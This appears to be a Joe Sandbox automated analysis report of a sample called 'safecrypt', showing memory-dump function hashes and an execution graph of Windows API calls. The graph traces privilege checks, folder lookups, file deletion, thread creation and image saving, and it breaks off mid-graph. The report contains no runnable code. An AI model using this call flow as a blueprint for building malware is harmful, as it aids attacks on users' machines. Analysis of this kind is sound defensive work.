                    • Opcode Fuzzy Hash: a4ddb456e16d676d7ddad0bf632ab18ea0a3fab2c526f2f4fad18b46aefe225a
                    • Instruction Fuzzy Hash: 11110B239385029DFB2D77B58D1AA3F788EBB80705B04AF1D9003D81D5EE79460FC4A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 64bc72617dbddc16c178752d2fe5edcb444676b1f65a233cf60c070721219435
                    • Instruction ID: 680f734322f8c0cd34f296a72b9d8de5e64b3c57cb817f5956311212915df21d
                    • Opcode Fuzzy Hash: 64bc72617dbddc16c178752d2fe5edcb444676b1f65a233cf60c070721219435
                    • Instruction Fuzzy Hash: BB215B72904105CEDB09FFA0C980E6DBAAAFB80308F55DB19C407AF256EFB5450ECB05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 091725af6dc5df62dc5a8191f0c2cc866ed3c675b6e12344e4e2024a4dce6300
                    • Instruction ID: d197170b1edf1cc64de24814622b0da83de0b5cf3358ca67a73aac1570ebc33f
                    • Opcode Fuzzy Hash: 091725af6dc5df62dc5a8191f0c2cc866ed3c675b6e12344e4e2024a4dce6300
                    • Instruction Fuzzy Hash: 471129235385029DEB2D7AB48D1AA3F794AAB80715F04AF2ED003D90E1EE39460FC496
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 3588f5e52ec049507abf0ce877314021c8aeaa653e7a2efcab5abb77f58e6a66
                    • Instruction ID: 341ddfe07ea0d425ac01d2d1b0121c1e6c60aa64aa38dfa5bca631ee27f48cfa
                    • Opcode Fuzzy Hash: 3588f5e52ec049507abf0ce877314021c8aeaa653e7a2efcab5abb77f58e6a66
                    • Instruction Fuzzy Hash: AB112374D18216ADEF2E77608C01E7975AAFB43705F2897CDE08FA5040FE3606878D49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 85be102351366d93fe2279f64feb52b65cf98c892d2e949f85ed22989106f610
                    • Instruction ID: d80c4fc3e6901ffa8a4f3aac7fdf9dd1245454e310648ae72b79d55eed5bf9ec
                    • Opcode Fuzzy Hash: 85be102351366d93fe2279f64feb52b65cf98c892d2e949f85ed22989106f610
                    • Instruction Fuzzy Hash: 28112B235385029DEF2D7BB48D1AA3F794AAB80705F04AF2ED003D90E5EE79460FC496
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: afa958eb6614f35532fc18f8b7d6f9277d004c03702536b71b16386e4565304e
                    • Instruction ID: d2db514b90cd2584806372ed69a818dca4c9a50dbb66a07cfd758e109a69e2da
                    • Opcode Fuzzy Hash: afa958eb6614f35532fc18f8b7d6f9277d004c03702536b71b16386e4565304e
                    • Instruction Fuzzy Hash: 8F113872905105CEDB49EFA4CAC0A5DBBA9FB40308F55DB29C5076F266EBB5450ECB00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: ed8ab764ffaa2b254a6b1054ac59e2026c5bdd62964111ca9fe22f3c2b99ec77
                    • Instruction ID: 471735a532eef1e7cb77fbd8ff2b59fef9682e3bb5a34127ee8a739622e63d77
                    • Opcode Fuzzy Hash: ed8ab764ffaa2b254a6b1054ac59e2026c5bdd62964111ca9fe22f3c2b99ec77
                    • Instruction Fuzzy Hash: 16112934C14112DDEF2A77608C01979396AFB43705F3C97DDE08E65040EE350687CE4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 9ae37d4ba15672adf97898008dabe5696302885614b3422b4ee3e73c819dc622
                    • Instruction ID: fae24dcb0ad594c82c45ea75dac9f3986a6f020b0c770afe8c6969fc008a99a8
                    • Opcode Fuzzy Hash: 9ae37d4ba15672adf97898008dabe5696302885614b3422b4ee3e73c819dc622
                    • Instruction Fuzzy Hash: B8112772804104CEDB49EFA4CAC4E5DFBA9FB40308F55DB29C5076F266EBB5460ACB04
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: da754e029dc0f317750cbeb8ba6861ef9e63b3ce74472296ec78becccf9029b0
                    • Instruction ID: 568c36c19b7625e3bbc929f91d3889233050b1592d2f33616b42338cd295fb7b
                    • Opcode Fuzzy Hash: da754e029dc0f317750cbeb8ba6861ef9e63b3ce74472296ec78becccf9029b0
                    • Instruction Fuzzy Hash: D4014734C04125ADEF2E7B608C05EB9396EFB43705F3893CDA04FA5140EE3506878E49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 8f266b6260de0bbadf2dcaaad9793f405081b38a76fbd8e88fc609ffdb53df60
                    • Instruction ID: 174daab87feae07c38f0f68f9806fdf06c3989236278371c05aee4528e2a853c
                    • Opcode Fuzzy Hash: 8f266b6260de0bbadf2dcaaad9793f405081b38a76fbd8e88fc609ffdb53df60
                    • Instruction Fuzzy Hash: 5F01F274D042259DEF2EBB608C05ABD756EFB52704F38A7CEE04EA5040EE7506878E5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4c4c3924c93d9f3240ae18658998b04fea34017ea5db1b964b647d844a0c4569
                    • Instruction ID: 0138083cdb6a1938e9694e9bc766b49af1d4e9fb54a790414a4e64da8c0dd570
                    • Opcode Fuzzy Hash: 4c4c3924c93d9f3240ae18658998b04fea34017ea5db1b964b647d844a0c4569
                    • Instruction Fuzzy Hash: 07F0F634C002299EDF2EBB608C05AAC763AFB42700F3893DED14E65090EE3246838E45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 15b4a2bdf7af8b15b9897b5924ec2506858c9786ed1657813c228293555d8498
                    • Instruction ID: 1862bde0dd023d3a80907f0366620584da38adbb8c696472578d79fecd25d395
                    • Opcode Fuzzy Hash: 15b4a2bdf7af8b15b9897b5924ec2506858c9786ed1657813c228293555d8498
                    • Instruction Fuzzy Hash: E6F0B474C002299EDF2EBB60CC15AAD767AFB42700F3497DED14E65050EE324A87CE45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Execution Graph

                    Execution Coverage:2.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:7.3%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:28

                    Graph

                    execution_graph 19187 4302df 19190 42cd82 19187->19190 19191 42cd8e __commit 19190->19191 19192 42a905 __getptd 66 API calls 19191->19192 19194 42cd93 19192->19194 19196 42f549 19194->19196 19205 42ce21 DecodePointer 19196->19205 19198 42f54e 19199 42f559 19198->19199 19206 42ce2e 19198->19206 19201 42f571 19199->19201 19202 426b68 __call_reportfault 8 API calls 19199->19202 19203 428858 _raise 66 API calls 19201->19203 19202->19201 19204 42f57b 19203->19204 19205->19198 19209 42ce3a __commit 19206->19209 19207 42ce95 19210 42ce77 DecodePointer 19207->19210 19213 42cea4 19207->19213 19208 42ce61 19211 42a88c __getptd_noexit 66 API calls 19208->19211 19209->19207 19209->19208 19209->19210 19215 42ce5d 19209->19215 19216 42ce66 _siglookup 19210->19216 19211->19216 19214 426d35 _write_string 66 API calls 19213->19214 19217 42cea9 19214->19217 19215->19208 19215->19213 19218 42cf01 19216->19218 19220 428858 _raise 66 API calls 19216->19220 19226 42ce6f __commit 19216->19226 19219 426ce3 __commit 11 API calls 19217->19219 19221 42cd4f __lock 66 API calls 19218->19221 19222 42cf0c 19218->19222 19219->19226 19220->19218 19221->19222 19224 42cf41 19222->19224 19227 42a755 RtlEncodePointer 19222->19227 19228 42cf95 19224->19228 19226->19199 19227->19224 19229 42cfa2 19228->19229 19230 42cf9b 19228->19230 19229->19226 19232 42cc76 LeaveCriticalSection 19230->19232 19232->19229 16348 426778 16386 428d80 16348->16386 16350 426784 GetStartupInfoW 16351 4267a3 16350->16351 16352 426798 HeapSetInformation 16350->16352 16387 4285a1 HeapCreate 16351->16387 16352->16351 16354 4267f1 16355 4267fc 16354->16355 16575 42674f 16354->16575 16388 42aa4e GetModuleHandleW 16355->16388 16358 426802 16359 42680d __RTC_Initialize 16358->16359 16360 42674f _fast_error_exit 66 API calls 16358->16360 16413 42b1f2 GetStartupInfoW 16359->16413 16360->16359 16363 426827 GetCommandLineW 16426 42bc41 GetEnvironmentStringsW 16363->16426 16367 426837 16432 42bb93 GetModuleFileNameW 16367->16432 16369 426841 16370 42684c 16369->16370 16371 42888c __amsg_exit 66 API calls 16369->16371 16436 42b961 16370->16436 16371->16370 16373 426852 16374 42685d 16373->16374 16375 42888c __amsg_exit 66 API calls 16373->16375 16450 42866b 16374->16450 16375->16374 16377 426865 16378 42888c __amsg_exit 66 API calls 16377->16378 16379 426870 __wwincmdln 16377->16379 16378->16379 16456 41f3e0 16379->16456 16381 426892 16382 4268a0 16381->16382 16572 428842 16381->16572 16590 42886e 16382->16590 16385 4268a5 __commit 16386->16350 16387->16354 16389 42aa62 16388->16389 16390 42aa6b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 16388->16390 16593 42a79b 16389->16593 16392 42aab5 TlsAlloc 16390->16392 16395 42ab03 TlsSetValue 16392->16395 16396 42abc4 16392->16396 16395->16396 16397 42ab14 16395->16397 16396->16358 16603 428614 16397->16603 16402 42abbf 16404 42a79b __mtterm 70 API calls 16402->16404 16403 42ab5c DecodePointer 16405 42ab71 16403->16405 16404->16396 16405->16402 16612 42c852 16405->16612 16408 42ab8f DecodePointer 16409 42aba0 16408->16409 16409->16402 16410 42aba4 16409->16410 16618 42a7d8 16410->16618 16412 42abac GetCurrentThreadId 16412->16396 16414 42c852 __calloc_crt 66 API calls 16413->16414 16425 42b210 16414->16425 16415 42b3bb GetStdHandle 16421 42b385 16415->16421 16416 42c852 __calloc_crt 66 API calls 16416->16425 16417 42b41f SetHandleCount 16420 42681b 16417->16420 16418 42b3cd GetFileType 16418->16421 16419 42b305 16419->16421 16422 42b331 GetFileType 16419->16422 16423 42b33c InitializeCriticalSectionAndSpinCount 16419->16423 16420->16363 16583 42888c 16420->16583 16421->16415 16421->16417 16421->16418 16424 42b3f3 InitializeCriticalSectionAndSpinCount 16421->16424 16422->16419 16422->16423 16423->16419 16423->16420 16424->16420 16424->16421 16425->16416 16425->16419 16425->16420 16425->16421 16425->16425 16427 42bc52 16426->16427 16428 42bc56 16426->16428 16427->16367 16429 42c80d __malloc_crt 66 API calls 16428->16429 16430 42bc78 _memmove 16429->16430 16431 42bc7f FreeEnvironmentStringsW 16430->16431 16431->16367 16433 42bbc8 _wparse_cmdline 16432->16433 16434 42c80d __malloc_crt 66 API calls 16433->16434 16435 42bc0b _wparse_cmdline 16433->16435 16434->16435 16435->16369 16437 42b979 _wcslen 16436->16437 16439 42b971 16436->16439 16438 42c852 __calloc_crt 66 API calls 16437->16438 16442 42b99d _wcslen 16438->16442 16439->16373 16440 42b9f3 16441 4258b8 _free 66 API calls 16440->16441 16441->16439 16442->16439 16442->16440 16443 42c852 __calloc_crt 66 API calls 16442->16443 16444 42ba19 16442->16444 16445 426210 __wsetenvp 66 API calls 16442->16445 16447 42ba30 16442->16447 16443->16442 16446 4258b8 _free 66 API calls 16444->16446 16445->16442 16446->16439 16448 426c91 __invoke_watson 10 API calls 16447->16448 16449 42ba3c 16448->16449 16449->16373 16451 428679 __IsNonwritableInCurrentImage 16450->16451 16861 42c7ea 16451->16861 16453 428697 __initterm_e 16455 4286b8 __IsNonwritableInCurrentImage 16453->16455 16864 42d112 16453->16864 16455->16377 16929 42dfb0 16456->16929 16460 41f435 AllocateAndInitializeSid 16461 41f493 SHGetFolderPathW 16460->16461 16462 41f46b CheckTokenMembership 16460->16462 16944 4233b0 16461->16944 16464 41f480 16462->16464 16465 41f484 FreeSid 16462->16465 16464->16465 16465->16461 16466 41f4d4 10 API calls 16954 425aa2 16466->16954 16469 425aa2 __NMSG_WRITE 66 API calls 16470 41f59b 16469->16470 16471 425aa2 __NMSG_WRITE 66 API calls 16470->16471 16472 41f5b2 SHGetFolderPathW SHGetFolderPathW SHGetFolderPathW GetModuleFileNameW 16471->16472 16473 426210 __wsetenvp 66 API calls 16472->16473 16474 41f5fe 16473->16474 16475 425aa2 __NMSG_WRITE 66 API calls 16474->16475 16476 41f615 DeleteFileW 16475->16476 16963 420440 CreateFileW 16476->16963 16478 41f628 LookupPrivilegeValueA 16479 41f642 16478->16479 16480 41f64b 16478->16480 16966 4204d0 GetCurrentProcess OpenProcessToken 16479->16966 16973 41fc40 16480->16973 16483 41f655 16484 41f6c8 16483->16484 16485 41f65c 16483->16485 16487 41fd50 108 API calls 16484->16487 16486 41f695 16485->16486 16488 41f669 16485->16488 16489 41f6cd 16486->16489 16992 41fd50 16486->16992 16487->16489 16488->16489 16491 41f674 16488->16491 16492 41f679 16489->16492 17032 412fc0 16489->17032 17011 41eb60 16491->17011 16496 4256d3 __write_nolock 5 API calls 16492->16496 16493 41f6a8 16493->16489 16497 41f6ac 16493->16497 16499 41f68f 16496->16499 16500 4256d3 __write_nolock 5 API calls 16497->16500 16498 41f6de GetLastError 16498->16492 16503 41f6f7 _memset 16498->16503 16499->16381 16501 41f6c2 16500->16501 16501->16381 16504 41f707 GetVersionExW 16503->16504 17049 401470 16504->17049 16509 412fc0 6 API calls 16510 41f740 CreateThread 16509->16510 17076 41f1c0 16510->17076 16514 41f1c0 10 API calls 16515 41f77e 16514->16515 16516 41f1c0 10 API calls 16515->16516 16517 41f78b 16516->16517 16518 41f1c0 10 API calls 16517->16518 16519 41f798 16518->16519 16520 41f1c0 10 API calls 16519->16520 16521 41f7a5 16520->16521 17082 41eee0 16521->17082 16526 420730 97 API calls 16527 41f89f _memset 16526->16527 16527->16527 17136 42643b 16527->17136 16532 41f92f 17169 4265fb 16532->17169 16533 41f957 16535 41f95d GdipAlloc 16533->16535 16538 41f98e 16533->16538 16537 41f96b GdipCreateBitmapFromHBITMAP 16535->16537 16535->16538 16536 41f939 17182 420560 GetDC CreateCompatibleBitmap 16536->17182 16537->16538 16539 41f9ca CreateThread SetThreadPriority WaitForSingleObject 16538->16539 16541 412fc0 6 API calls 16538->16541 16540 41fa0b _memset 16539->16540 17192 414320 16540->17192 16542 41f9b9 16541->16542 16542->16539 16549 414320 97 API calls 16550 41fa6e 16549->16550 17209 41fbe0 CreateFileW 16550->17209 16553 420750 6 API calls 16554 41fa8b 16553->16554 16555 414320 97 API calls 16554->16555 16556 41faaa GdipSaveImageToFile 16555->16556 16557 41fad0 16556->16557 16558 420750 6 API calls 16557->16558 16559 41fae4 16558->16559 16560 412fc0 6 API calls 16559->16560 16561 41faf4 16560->16561 16562 412fc0 6 API calls 16561->16562 16563 41fb10 16562->16563 18768 428702 16572->18768 16574 428853 16574->16382 16576 426762 16575->16576 16577 42675d 16575->16577 16579 4288d0 __NMSG_WRITE 66 API calls 16576->16579 16578 428a7f __FF_MSGBANNER 66 API calls 16577->16578 16578->16576 16580 42676a 16579->16580 16581 4285ea __mtinitlocknum 3 API calls 16580->16581 16582 426774 16581->16582 16582->16355 16584 428a7f __FF_MSGBANNER 66 API calls 16583->16584 16585 428896 16584->16585 16586 4288d0 __NMSG_WRITE 66 API calls 16585->16586 16587 42889e 16586->16587 18798 428858 16587->18798 16591 428702 _doexit 66 API calls 16590->16591 16592 428879 16591->16592 16592->16385 16594 42a7a5 DecodePointer 16593->16594 16595 42a7b4 16593->16595 16594->16595 16596 42a7c5 TlsFree 16595->16596 16597 42a7d3 16595->16597 16596->16597 16598 42cc3b DeleteCriticalSection 16597->16598 16599 42cc53 16597->16599 16631 4258b8 16598->16631 16601 42cc65 DeleteCriticalSection 16599->16601 16602 42aa67 16599->16602 16601->16599 16602->16358 16657 42a755 RtlEncodePointer 16603->16657 16605 42861c __init_pointers __initp_misc_winsig 16658 42cdbb EncodePointer 16605->16658 16607 428642 EncodePointer EncodePointer EncodePointer EncodePointer 16608 42cbd5 16607->16608 16609 42cbe0 16608->16609 16610 42cbea InitializeCriticalSectionAndSpinCount 16609->16610 16611 42ab58 16609->16611 16610->16609 16610->16611 16611->16402 16611->16403 16614 42c85b 16612->16614 16615 42ab87 16614->16615 16616 42c879 Sleep 16614->16616 16659 42e3e0 16614->16659 16615->16402 16615->16408 16617 42c88e 16616->16617 16617->16614 16617->16615 16670 428d80 16618->16670 16620 42a7e4 GetModuleHandleW 16671 42cd4f 16620->16671 16622 42a822 InterlockedIncrement 16678 42a87a 16622->16678 16625 42cd4f __lock 64 API calls 16626 42a843 16625->16626 16681 42a41c InterlockedIncrement 16626->16681 16628 42a861 16693 42a883 16628->16693 16630 42a86e __commit 16630->16412 16632 4258c3 HeapFree 16631->16632 16633 4258ec __dosmaperr 16631->16633 16632->16633 16634 4258d8 16632->16634 16633->16597 16637 426d35 16634->16637 16640 42a88c GetLastError 16637->16640 16639 4258de GetLastError 16639->16633 16654 42a767 TlsGetValue 16640->16654 16643 42a8f9 SetLastError 16643->16639 16644 42c852 __calloc_crt 62 API calls 16645 42a8b7 16644->16645 16645->16643 16646 42a8bf DecodePointer 16645->16646 16647 42a8d4 16646->16647 16648 42a8f0 16647->16648 16649 42a8d8 16647->16649 16651 4258b8 _free 62 API calls 16648->16651 16650 42a7d8 __getptd_noexit 62 API calls 16649->16650 16653 42a8e0 GetCurrentThreadId 16650->16653 16652 42a8f6 16651->16652 16652->16643 16653->16643 16655 42a797 16654->16655 16656 42a77c DecodePointer TlsSetValue 16654->16656 16655->16643 16655->16644 16656->16655 16657->16605 16658->16607 16660 42e407 16659->16660 16661 42e3ec 16659->16661 16664 42e41a RtlAllocateHeap 16660->16664 16665 42e441 16660->16665 16668 428ac7 DecodePointer 16660->16668 16661->16660 16662 42e3f8 16661->16662 16663 426d35 _write_string 65 API calls 16662->16663 16666 42e3fd 16663->16666 16664->16660 16664->16665 16665->16614 16666->16614 16669 428adc 16668->16669 16669->16660 16670->16620 16672 42cd77 EnterCriticalSection 16671->16672 16673 42cd64 16671->16673 16672->16622 16696 42cc8d 16673->16696 16675 42cd6a 16675->16672 16676 42888c __amsg_exit 65 API calls 16675->16676 16677 42cd76 16676->16677 16677->16672 16859 42cc76 LeaveCriticalSection 16678->16859 16680 42a83c 16680->16625 16682 42a43a InterlockedIncrement 16681->16682 16683 42a43d 16681->16683 16682->16683 16684 42a447 InterlockedIncrement 16683->16684 16685 42a44a 16683->16685 16684->16685 16686 42a457 16685->16686 16687 42a454 InterlockedIncrement 16685->16687 16688 42a461 InterlockedIncrement 16686->16688 16690 42a464 16686->16690 16687->16686 16688->16690 16689 42a47d InterlockedIncrement 16689->16690 16690->16689 16691 42a48d InterlockedIncrement 16690->16691 16692 42a498 InterlockedIncrement 16690->16692 16691->16690 16692->16628 16860 42cc76 LeaveCriticalSection 16693->16860 16695 42a88a 16695->16630 16697 42cc99 __commit 16696->16697 16698 42ccbf 16697->16698 16721 428a7f 16697->16721 16706 42cccf __commit 16698->16706 16757 42c80d 16698->16757 16704 42ccf0 16709 42cd4f __lock 65 API calls 16704->16709 16705 42cce1 16708 426d35 _write_string 65 API calls 16705->16708 16706->16675 16708->16706 16711 42ccf7 16709->16711 16712 42cd2a 16711->16712 16713 42ccff InitializeCriticalSectionAndSpinCount 16711->16713 16716 4258b8 _free 65 API calls 16712->16716 16714 42cd1b 16713->16714 16715 42cd0f 16713->16715 16763 42cd46 16714->16763 16717 4258b8 _free 65 API calls 16715->16717 16716->16714 16719 42cd15 16717->16719 16720 426d35 _write_string 65 API calls 16719->16720 16720->16714 16766 42d3e8 16721->16766 16723 428a86 16724 42d3e8 __FF_MSGBANNER 66 API calls 16723->16724 16726 428a93 16723->16726 16724->16726 16725 4288d0 __NMSG_WRITE 66 API calls 16727 428aab 16725->16727 16726->16725 16728 428ab5 16726->16728 16729 4288d0 __NMSG_WRITE 66 API calls 16727->16729 16730 4288d0 16728->16730 16729->16728 16731 4288f1 __NMSG_WRITE 16730->16731 16732 428a0d 16731->16732 16733 42d3e8 __FF_MSGBANNER 63 API calls 16731->16733 16827 4256d3 16732->16827 16736 42890b 16733->16736 16735 428a7d 16754 4285ea 16735->16754 16737 428a1c GetStdHandle 16736->16737 16738 42d3e8 __FF_MSGBANNER 63 API calls 16736->16738 16737->16732 16741 428a2a _strlen 16737->16741 16739 42891c 16738->16739 16739->16737 16740 42892e 16739->16740 16740->16732 16791 426210 16740->16791 16741->16732 16744 428a60 WriteFile 16741->16744 16744->16732 16745 42895a GetModuleFileNameW 16746 42897b 16745->16746 16749 428987 _wcslen 16745->16749 16748 426210 __wsetenvp 63 API calls 16746->16748 16747 426c91 __invoke_watson 10 API calls 16747->16749 16748->16749 16749->16747 16751 425aa2 63 API calls __NMSG_WRITE 16749->16751 16752 4289fd 16749->16752 16800 425e0c 16749->16800 16751->16749 16809 42d27c 16752->16809 16837 4285bf GetModuleHandleW 16754->16837 16759 42c816 16757->16759 16760 42c84c 16759->16760 16761 42c82d Sleep 16759->16761 16841 4258f2 16759->16841 16760->16704 16760->16705 16762 42c842 16761->16762 16762->16759 16762->16760 16858 42cc76 LeaveCriticalSection 16763->16858 16765 42cd4d 16765->16706 16768 42d3f4 16766->16768 16767 426d35 _write_string 66 API calls 16769 42d417 16767->16769 16768->16767 16770 42d3fe 16768->16770 16773 426ce3 16769->16773 16770->16723 16776 426cb6 DecodePointer 16773->16776 16777 426ccb 16776->16777 16782 426c91 16777->16782 16779 426ce2 16780 426cb6 __commit 10 API calls 16779->16780 16781 426cef 16780->16781 16781->16723 16785 426b68 16782->16785 16786 426b87 _memset __call_reportfault 16785->16786 16787 426ba5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16786->16787 16790 426c73 __call_reportfault 16787->16790 16788 4256d3 __write_nolock 5 API calls 16789 426c8f GetCurrentProcess TerminateProcess 16788->16789 16789->16779 16790->16788 16792 426225 16791->16792 16793 42621e 16791->16793 16794 426d35 _write_string 66 API calls 16792->16794 16793->16792 16798 426246 16793->16798 16795 42622a 16794->16795 16796 426ce3 __commit 11 API calls 16795->16796 16797 426234 16796->16797 16797->16745 16797->16749 16798->16797 16799 426d35 _write_string 66 API calls 16798->16799 16799->16795 16804 425e1e 16800->16804 16801 425e22 16802 425e27 16801->16802 16803 426d35 _write_string 66 API calls 16801->16803 16802->16749 16805 425e3e 16803->16805 16804->16801 16804->16802 16807 425e65 16804->16807 16806 426ce3 __commit 11 API calls 16805->16806 16806->16802 16807->16802 16808 426d35 _write_string 66 API calls 16807->16808 16808->16805 16835 42a755 RtlEncodePointer 16809->16835 16811 42d2a2 16812 42d2b2 LoadLibraryW 16811->16812 16813 42d32f 16811->16813 16815 42d3c7 16812->16815 16816 42d2c7 GetProcAddress 16812->16816 16814 42d35c 16813->16814 16818 42d349 DecodePointer DecodePointer 16813->16818 16819 42d392 DecodePointer 16814->16819 16820 42d3bb DecodePointer 16814->16820 16826 42d37f 16814->16826 16823 4256d3 __write_nolock 5 API calls 16815->16823 16816->16815 16817 42d2dd 7 API calls 16816->16817 16817->16813 16822 42d31f GetProcAddress EncodePointer 16817->16822 16818->16814 16819->16820 16821 42d399 16819->16821 16820->16815 16821->16820 16825 42d3ac DecodePointer 16821->16825 16822->16813 16824 42d3e6 16823->16824 16824->16732 16825->16820 16825->16826 16826->16820 16828 4256db 16827->16828 16829 4256dd IsDebuggerPresent 16827->16829 16828->16735 16836 42bd80 16829->16836 16832 4269bc SetUnhandledExceptionFilter UnhandledExceptionFilter 16833 4269e1 GetCurrentProcess TerminateProcess 16832->16833 16834 4269d9 __call_reportfault 16832->16834 16833->16735 16834->16833 16835->16811 16836->16832 16838 4285d3 GetProcAddress 16837->16838 16839 4285e8 ExitProcess 16837->16839 16838->16839 16840 4285e3 16838->16840 16840->16839 16842 42596f 16841->16842 16849 425900 16841->16849 16843 428ac7 _malloc DecodePointer 16842->16843 16844 425975 16843->16844 16846 426d35 _write_string 65 API calls 16844->16846 16845 428a7f __FF_MSGBANNER 65 API calls 16850 42590b 16845->16850 16857 425967 16846->16857 16847 42592e RtlAllocateHeap 16847->16849 16847->16857 16848 4288d0 __NMSG_WRITE 65 API calls 16848->16850 16849->16847 16849->16850 16851 42595b 16849->16851 16854 428ac7 _malloc DecodePointer 16849->16854 16855 425959 16849->16855 16850->16845 16850->16848 16850->16849 16853 4285ea __mtinitlocknum 3 API calls 16850->16853 16852 426d35 _write_string 65 API calls 16851->16852 16852->16855 16853->16850 16854->16849 16856 426d35 _write_string 65 API calls 16855->16856 16856->16857 16857->16759 16858->16765 16859->16680 16860->16695 16862 42c7f0 EncodePointer 16861->16862 16862->16862 16863 42c80a 16862->16863 16863->16453 16867 42d0d6 16864->16867 16866 42d11f 16866->16455 16868 42d0e2 __commit 16867->16868 16875 428602 16868->16875 16874 42d103 __commit 16874->16866 16876 42cd4f __lock 66 API calls 16875->16876 16877 428609 16876->16877 16878 42cfef DecodePointer DecodePointer 16877->16878 16879 42d09e 16878->16879 16880 42d01d 16878->16880 16889 42d10c 16879->16889 16880->16879 16892 42f57c 16880->16892 16882 42d081 EncodePointer EncodePointer 16882->16879 16883 42d02f 16883->16882 16884 42d053 16883->16884 16899 42c89e 16883->16899 16884->16879 16886 42c89e __realloc_crt 70 API calls 16884->16886 16887 42d06f EncodePointer 16884->16887 16888 42d069 16886->16888 16887->16882 16888->16879 16888->16887 16925 42860b 16889->16925 16893 42f587 16892->16893 16894 42f59c HeapSize 16892->16894 16895 426d35 _write_string 66 API calls 16893->16895 16894->16883 16896 42f58c 16895->16896 16897 426ce3 __commit 11 API calls 16896->16897 16898 42f597 16897->16898 16898->16883 16902 42c8a7 16899->16902 16901 42c8e6 16901->16884 16902->16901 16903 42c8c7 Sleep 16902->16903 16904 42666f 16902->16904 16903->16902 16905 426685 16904->16905 16906 42667a 16904->16906 16908 42668d 16905->16908 16916 42669a 16905->16916 16907 4258f2 _malloc 66 API calls 16906->16907 16909 426682 16907->16909 16910 4258b8 _free 66 API calls 16908->16910 16909->16902 16924 426695 __dosmaperr 16910->16924 16911 4266d2 16913 428ac7 _malloc DecodePointer 16911->16913 16912 4266a2 HeapReAlloc 16912->16916 16912->16924 16914 4266d8 16913->16914 16917 426d35 _write_string 66 API calls 16914->16917 16915 426702 16919 426d35 _write_string 66 API calls 16915->16919 16916->16911 16916->16912 16916->16915 16918 